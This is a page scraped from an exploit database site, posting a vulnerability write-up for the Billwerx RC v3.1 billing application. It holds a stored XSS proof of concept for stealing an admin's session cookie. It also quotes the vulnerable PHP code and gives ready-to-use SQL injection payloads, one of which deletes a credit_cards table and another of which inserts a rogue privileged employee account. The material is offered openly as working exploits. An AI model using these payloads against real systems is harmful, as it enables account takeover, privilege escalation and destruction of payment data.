0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Billwerx RC v3.1 Multiple Vulnerabilities
========================================= Billwerx RC v3.1 Multiple Vulnerabilities ========================================= ################################################################# # # Billwerx RC v3.1 Multiple Vulnerabilities # Found By: mr_me # Download: http://www.billwerx.com/download.php # Tested On: Windows Vista # Note: For educational purposes only # ################################################################# XSS POC: A regular employee can embed javascript code that could be executed within the context of the admin's browser. If the user edits their own profile by going to "http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2" and places "<script>alert(document.cookie)</script>" into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin: http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2 The user could potentially log the admins cookie and reset their own session thus gaining administration access. SQL Injection POC: http://127.0.0.1/billwerx_public_beta/employees/company_files.php You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1 Here you can see in the code snip that the description post value is unsanitized. 8<-------------snip-------------8< $description = strtolower($_POST['description']); $employee_id = $_SESSION['employee_id']; $readfile = fopen($temp_name, 'r'); $content = fread($readfile, filesize($temp_name)); $content = addslashes($content); fclose($readfile); # Assign values to a database table: $doSQL = "INSERT INTO company_files (name, size, type, content, public, description, employee_id) VALUES ('$name', '$size', '$type', '$content', '$public', '$description', '$employee_id')"; 8<-------------snip-------------8< SQL Injection exploit: ','1'); DELETE FROM credit_cards;/* or ','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', 'mr_me@hax0r.com', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/* # 0day.today [2024-07-04] #